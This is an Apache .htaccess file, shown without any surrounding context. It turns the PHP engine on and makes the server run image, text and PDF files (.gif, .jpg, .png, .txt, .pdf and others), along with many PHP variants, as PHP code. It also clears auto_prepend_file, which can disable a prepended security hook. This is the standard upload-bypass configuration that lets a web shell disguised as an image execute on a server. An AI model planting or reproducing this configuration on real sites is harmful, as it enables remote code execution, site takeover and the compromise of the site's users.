<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php8.c>
php_flag engine on
</IfModule>
AddHandler application/x-httpd-php .php .phar .phtml .php5 .php4 .php3 .pht .shtml .inc .module .pgif .gif .jpg .jpeg .png .txt .pdf
AddType application/x-httpd-php .php .phar .phtml .php5 .php4 .php3 .pht .shtml .inc .module .pgif .gif .jpg .jpeg .png .txt .pdf
<FilesMatch "\.(?i:php[0-9]?|phar|phtml|pht|shtml|inc|module|pgif|gif|jpg|jpeg|png|txt|pdf)$">
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
</FilesMatch>
php_value auto_prepend_file none
